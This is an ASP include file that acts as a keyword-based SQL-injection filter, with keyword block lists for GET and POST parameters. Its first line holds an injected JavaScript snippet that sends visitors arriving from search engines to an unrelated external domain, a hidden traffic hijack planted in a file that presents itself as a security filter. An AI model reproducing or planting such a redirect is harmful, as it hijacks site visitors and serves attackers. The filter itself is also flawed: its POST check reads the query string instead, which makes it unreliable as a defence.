001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><% 002: dim Query_Word
003: dim Form_Word
004: Query_Word="'☆and☆select☆update☆chr☆DELETE☆%20from☆;☆insert☆mid☆master.☆set☆chr(37)☆="'在这部份定义get非法参数,使用"☆"号间隔
005: Form_Word="'☆%☆&☆*☆#☆@☆=" '在这部份定义post非法参数,使用"☆"号间隔
006: if request.QueryString<>"" then
007: Query_Word=split(Query_Word,"☆")
008: for each Query_Name in Request.QueryString
009: for i=0 to ubound(Query_Word)
010: if Instr(LCase(request.QueryString(Query_Name)),Query_Word(i))<>0 then
011: response.redirect "index.asp"
012: end if
013: next
014: next
015: end if
016:
017: if request.form<>"" then
018: Form_Word=split(Form_Word,"☆")
019: for each Form_Name in Request.Form
020: for i=0 to ubound(Form_Word)
021: if Instr(LCase(request.QueryString(Form_Name)),Form_Word(i))<>0 then
022: response.redirect "index.asp"
023: end if
024: next
025: next
026: end if
027: %>
028:
029:
030: